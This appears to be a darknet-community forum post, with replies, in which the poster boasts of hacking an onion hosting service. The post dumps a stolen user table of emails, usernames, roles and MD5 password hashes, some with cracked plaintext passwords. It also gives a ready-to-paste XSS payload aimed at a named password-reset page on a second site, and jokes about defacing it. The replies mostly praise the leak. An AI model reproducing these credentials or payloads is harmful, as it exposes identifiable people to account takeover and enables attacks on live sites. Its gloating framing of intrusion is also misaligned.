Warning Dont use ServNet Hosting !Hacked! !Avoid!

I just hacked ServNet Hosting's Userbase.

There is around 200 users encrypted with MD5 lol yeah MD5 encryption

URL:http://servnetshsztndcidotonion Vuln: SQLi Pwned: Yes Proof: Below Verified: Yeah

Bonus DHL http://darkheroesq46awldotonion Vuln: 2 XSS Pwned: Not yet but someone will soon. Proof: Below Verified: Yeah Go here:http://darkheroesq46awldotonion/reset_password Put this: '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|><plaintext/onmouseover=prompt(1)>

On the Orders page orderID=12371232112 << XSS can be used to spread malcious shit to users

I tried to warn them twice . 2 Fucking times Both ServNet and DHL, but no response so this is what you get

I'm 100% sure others have found this too stay safe!

Attack info. They have had 2 SQL vulnerbilities for ever and they dont even bother to answer mail or fucking support tickets .

Just for the lulz | 63 | Aktif | BM-2cV7cG2CKakMTjA7gKFFVUrEhsomf9SGhE@bitmessage.ch | servnet-admin | Administrator | 50879657f201f456a4511a475a55cd18 | | 66 | aktif | djpeenk@gmail.com | vertobaff | User | 517b3f46164c7267488968b4baf85398 | | 68 | aktif | humanproject@sigaint.org | human | User | d25a967eb7a41cda2bda0b53c162e432 | | 69 | aktif | brokenrogue@gmail.com | Broken311 | User | 95a3757832104e83d212950647847310 (archer11) | | 70 | aktif | mikyas35@gmail.com | Alca311 | User | fcb1aacbd5998fc4d1758d97bca2644a | | 72 | aktif | ubiconet@gmail.com | rw1contact | User | 5d5d22ee0c9a82768c014757576eca21 | | 73 | aktif | phanmem997@get.pp.ua | phanmem997 | User | 58eb8cb7ebed6265de4422325a7bc767 | | 74 | aktif | mister.ghost@hmamail.com | Mr-Ghost | User | ac62e0fff991a6674db8162d86879dea | | 75 | aktif | kawabata@protonmail.ch | kawabata | User | 86f77fbebbcc103d94c298289ace89fa | | 76 | aktif | vapourobject@sigaint.com | vapour | User | aa23465e3af42f06771c8b9459a91f92 | | 77 | aktif | vapourobject@sigaint.org | object | User | 86f77fbebbcc103d94c298289ace89fa | | 78 | aktif | test@test.com | testuser | User | 850e5636a290b351d788cff8f1091369 | | 79 | aktif | yuri.orlov80@mail.ru | yuriorlov | User | cde519bddd6ca4c3360467c34bea2583 | | 80 | aktif | onebot@onebot.com | onebot | User | 01470ed56c8ac6e996f797aa733f2a24 | | 81 | aktif | cartoonbr@sigaint.org | cartoonbr | User | 7fc604c1e705bc1f9080f2cbb8afeb55 | | 82 | aktif | l3xxxlluth3r@protonmail.com | l3xxx | User | a423df3b565606041513f30c0a78c9f6 | | 83 | aktif | l3xxxluth3r@protonmail.com | l3xxxx | User | a423df3b565606041513f30c0a78c9f6 | | 84 | aktif | motawakilk19@gmail.com | shadow305 | User | 5c31687a2e9ac6d2bca540cccf6f6ec8 | | 85 | aktif | test@test.fr | Test0005 | User | 715c2fbb579730a61f06f972f7ca24ff | | 86 | aktif | stoned100@sigaint.org | stoned100 | User | 72952cdfa2be8bd9e1d556777e783940 | | 87 | aktif | asdasd@asdasd.com | asdasd | User | 4f7818f30719e6a65194284a0c58050e | | 88 | aktif | clownschool@sigaint.org | TheMaster | User | 7cc5a55adbc2aef341656c303658aab0 (clown123) | | 89 | aktif | BillyPlant@Sigaint.Org | BillyPlant | User | dc8ed92072600a829b1d29f056eaab7e | | 90 | aktif | ominemo@protonmail.com | ominemo | User | 9e3aa2de835f189db099fe378cee6727 | | 91 | aktif | d@winzen4.de | DanWin1210 | User | 40cf993dada165fc7ff05e51f8a42e9d | | 92 | aktif | mrbeardgame@mail.com | mrbeard | User | f824b728cc92e3e8196158415e6de631 | | 93 | aktif | sheldon.corey@openmailbox.org | linuxnet | User | 0cf0f0fe09e72f30abab2790aa0da95a | | 94 | aktif | FireMan.Sam@Sigaint.Org | FireManSam | User | 6a30ac65648873026bc777486d651cad | | 95 | aktif | smartaries@live.com | smartaries | User | 2ea5fa98b6909d7b296441532b57dcc0 | | 96 | aktif | james.moriarty@sigaint.org | gollum | User | ec429e6b71db13a5487f1f7a66053c4f | | 97 | aktif | 8791504@mail2tor.com | 8791504 | User | 3651f77bab1a7d241cc300788243d5b7 | | 98 | aktif | billythekiller@sigaint.org | billy__ | User | 925f7a9d9e0f1f288d96f0262e3d6ad7 | | 99 | aktif | jumpingjack@sigaint.org | jumpingjac | User | 99eb5eb6e26676eda9dbd54b1e146b24 | | 100 | aktif | BM-2cXBuquKDvzDFPm7w1vaDC8MRQUN6pyM2d@bitmessage.ch | ZordOnline | User | ea8277fc3be654df8309b67c8df47f60 | | 101 | aktif | BM-2cTb3mCaFSHtQUE85SV9f5Sn95Gr5HWbSb@bitmessage.ch | Club666 | User | a65b7c8b27380447643623f846e78f28 | | 102 | aktif | htcfan87@hotmail.com | htcfan87 | User | 14076db6760996ed61ab8e2c6088c38a | | 103 | aktif | lfu8y75@nutpa.net | terruss | User | ce92483dca75cc45ec715db825aa7f31 | | 104 | aktif | 3cfx379@vps30.com | 3cfx379 | User | ed135e1270928f63f3227ad7ac6dc3e5 | | 105 | aktif | 8cb427@nutpa.net | 8cb427 | User | ae263b301ab6da4e12ec22bb65329de5 | | 106 | aktif | cardinaledgellc@protonmail.com | plethora | User | 9a69ec1131d97a95f4ff5605e1e39f87 | | 107 | aktif | makaveli@bitmai.la | Fullhouse | User | 5117fe7820d0fe7c3a02a28190e33ec2 | | 108 | aktif | tink@mail2tor.com | Tink | User | 7a86f7b95f66b94566f54aea9d476594 | | 109 | aktif | andrew.button@email.com | assassin | User | d58319fec3d09b7ca8ff851df0f6051a | | 110 | aktif | hip_hop_on@mail.ru | xaker37 | User | 60131b826fa273bce709a3410df81e71 | | 111 | aktif | atau@googlemail.com | atau | User | fd08f03524ae2cf9ab48611e4a913bb1 | | 112 | aktif | jtwright@protonmail.com | gamechange | User | 80d6df86a11c084be3aff869657893d6 | | 113 | aktif | Ge33gj34iergker@mail2tor.com | ndjfkskdf | User | 411ab4fde587d1b3f1ca1156c42adbea | | 114 | aktif | grieco@mail2tor.com | Grieco | User |

| 115 | aktif | Letmein1@mail2tor.com | Letmein1 | User | faf32cc2671abb31953050b25f5772f8 (Letmein1) | | 116 | aktif | wintersale@mail2tor.com | wintersale | User | 1f781558487835106a2fc16bf797402c | | 117 | aktif | milespower55@gmail.com | SCP-087-B | User | 91c80c85178e005b29b6bf7545e79acd | | 118 | aktif | homemnomeio@gmail.com | shellcoder | User | 8d0bfa23a705ae712a03a4a8175e66e4 | | 120 | aktif | test@gmail.com | test123 | User | 7656bdedcf7769fa5cc8128ee3615c38 | | 121 | aktif | caynex1do@yahoo.com | johnsayne | User | 69926f28942daa8b272d2e73298fb166 (haha123123) | | 122 | aktif | heheasdas@gmail.com | paynwi | User | 69926f28942daa8b272d2e73298fb166 (haha123123) | | 123 | aktif | OLASDASD@gmail.com | paynwi123 | User | 1057e654ff00001fb5ed8d1ad4c3f46b (hehe123) | | 124 | aktif | gw@lelantos.org | gw | User | 9cf0e877fb1bc88cfd577efaf62c7579 (rooster) | | 125 | aktif | def4cer@mail.com | def4cer | User | 850e5636a290b351d788cff8f1091369 | | 126 | aktif | onicptr@gmail.com | NullSec | User | 718a73ff54d0a5c6d14d18e221c40ba1 | | 127 | aktif | abcrew74@gmail.com | lorranvps | User | 2c49b2d664227e35a4f4d8e70fca1dcf (shuriken) | | 128 | aktif | harold.underwood@writeme.com | haroldund | User | 2661d7c08059c66eabfbdcc85ad6c788 | | 129 | aktif | waifuhosting@cock.li | maximus | User | 32fc671db59c5de51a4983ee85080f11 | | 130 | aktif | ykbrt2017@gmail.com | y2k | User | 661f9cee7e27c8f57c2c296bca17eb5a | | 131 | aktif | engineerahmed290@yahoo.com | 20120070 | User | 88c69fa2da6add5c372a58a58e9103ba | | 132 | aktif | kasdkasd@gmail.com | fuckabitch | User | 42658289aca8c4a6d97605d2169f3314 | | 133 | aktif | pacorabane@pacorabane.to | pacorabane | User | 38bf01ab4ba5d4919325d8c526e6b008 (helsinki) | | 134 | aktif | ez3@protonmail.ch | isv | User | 6c141ab865c4791645a5f71668a1937d | | 135 | aktif | testtest@byom.de | testtest | User | 05a671c66aefea124cc08b76ea6d30bb (testtest) | | 136 | aktif | test01@test.com | test01 | User | 850e5636a290b351d788cff8f1091369 | | 137 | aktif | B4TM4N2001@ProtonMail.com | B4TM4N2001 | User | 3725fe71060f11f5db35fdf294fe826d | | 138 | aktif | ljifuuu0@gmail.com | jhgyyhgfs | User | 2519f3c2a53e9146f1c7df8ff2542e53 | | 139 | aktif | kasdkaxsd@gmail.com | fuckheaD | User | de75911052ce42a5f2f836cc96469e8f | | 140 | aktif | kaskdas@wow.com | meandyou | User | de75911052ce42a5f2f836cc96469e8f | | 141 | aktif | asdas@gmail.com | johncrack | User | f5bb0c8de146c67b44babbf4e6584cc0 (123123123) | | 142 | aktif | icecreamseakanakan@gmail.com | 123123 | User | f5bb0c8de146c67b44babbf4e6584cc0 (123123123) | | 143 | aktif | hopydz@gmail.com | hopydz | User | f5bb0c8de146c67b44babbf4e6584cc0 (123123123) | | 144 | aktif | WAXBRAIN@protonmail.com | BIGNDSMALL | User | 112a3468c82132ec4ff1badafe09611c | | 145 | aktif | BM-2cVNMA7acevnw7199tQehU9yTCgVTK3SLA@bitmessage.ch | rms | User | 98c2061bcebd202be8b005eedba5d317 | | 146 | aktif | nope@nope.org | 1 | User | bbb8aae57c104cda40c93843ad5e6db8 (111111111) | | 147 | aktif | polycypher@mail2tor.com | polycypher | User | e034e5791215a027feead0b4ff618e94 | | 148 | aktif | h3xagon@mail2tor.com | h3agon | User | d41917d971df35cc70060dbc4e498683 | | 149 | aktif | black_file@protonmail.ch | Black_file | User | 1f42f63ef7f67b5c5ecfd9a3db0aa5b4 | | 150 | aktif | paragate1@yandex.com | paragate | User | da8f972bcd5b4eb91ba37cef1e8447f2 | | 151 | aktif | kevil@tor2mail.com | Evil | User | 90b92b3889d9942d4be539e5d15408b9 | | 152 | aktif | LoyalOil@vpn.tg | LoyalOil | User | e99a18c428cb38d5f260853678922e03 (abc123) | | 153 | aktif | omtaretuttare.turesoha@yandex.com | omtare | User | 947e5c03f2cdaf0f2aa1ebd9eac3843c | | 154 | aktif | davidserna@mail-on.us | qBWC9R7K4f | User | f07fb2459b292d3ff46c6bdcd0fbf7d9 | | 155 | aktif | didw@bitmai.la | didw | User | a5294de07aec4defdfbf703378781fb0 | | 157 | aktif | mrsash@protonmail.com | sash | User | 441f59ad721d3cf27f7461a2cd420d56 | | 158 | aktif | s_csidep@protonmail.com | s_csidep | User | 41daa33d86f25a3a08ddc998da37c9eb | | 159 | aktif | siirhb2o@gmail.com | siirhb2o | User | a56049f98f35fb195c3441bae2f95cb1 | | 160 | aktif | KissyMissy@SecMail.Pro | KissyMissy | User | 55f8c964968539432b1498e2753d7604 | | 161 | aktif | dehfgtyediw@doesnotwork.com | Scarlett | User | b61f8835e5bb6ad5dca98284a6bda50d | | 162 | aktif | 123123kasksda@gmail.com | lol123 | User | 7656bdedcf7769fa5cc8128ee3615c38 | | 163 | aktif | darknetgamer@mail2tor.com | darknet | User | b6ca099e75b61c32c0f822b46665fb69 | | 165 | aktif | unsc@mail2tor.com | Tombraider | User | 9583ce9f8bccbb8dce9aac34204351d5 | | 166 | aktif | John@protonmail.com | John | User | 10d17f83d9d742b39d692e2dbf516c54 (blackburn) | | 167 | aktif | dnasardonic@protonmail.com | dnasardoni | User | cf4fc6f26bb8b0ca04406846d2352c52 | | 168 | aktif | yesyes1234@protonmail.com | yesyes | User | 10d17f83d9d742b39d692e2dbf516c54 (blackburn) | | 169 | aktif | karaoke@gmail.com | karaoke | User | a7896f695ee41f5f0425fa996791f74f (karaoke) | | 170 | aktif | tedjackal@mail.com | tedjackal | User | c5b79f11b30dff9610c4a952ed4171f9 | | 171 | aktif | crendor@yandex.com | crendor | User | c6ed57ecfaf7392342ba1a797d0994c0 | | 172 | aktif | kasda@gmail.com | dopeboy123 | User | de75911052ce42a5f2f836cc96469e8f

EDIT:: I dont bother to deface the site someone will prolly do it:) soon but if you want me to do i treally I can just a bit lazy :P just dont hope it will be some romanian lol cyber police or FBI banner haha

EDIT 2:: I think DHL is going soon or is already to be honest i wouldent use it not even log into the site

Btw saw some ads here on Reddit advertising theese guys. Good day!


Comments


[11 Points] Tomislav23:

I just want AB back so i can enjoy an easy-to-use market and not follow all of this drama


[6 Points] Inthewirelain:

md5 encryption

-_- I think the community needs a lesson in cryptography.


[6 Points] t0mcheck:

..


[2 Points] klookass:

you're a hero man. thanks for not leaking this shit to feds loll


[1 Points] None:

[deleted]


[1 Points] PonderingYou:

/u/hugbunter posted them XSS injections already


[1 Points] systemongrid:

Who cares? Anyway, none of those webhosting allows such DarkNetMarkets related content. Or if they find it, the server will not be shutdown? lol If users are worried about their shits, should not get third party servers for obscure activities. Tor isn't secure as you think. Here is an example on surface: https://onehostcloud.hosting/tor-hidden-service/ another cheap hidden service hosting.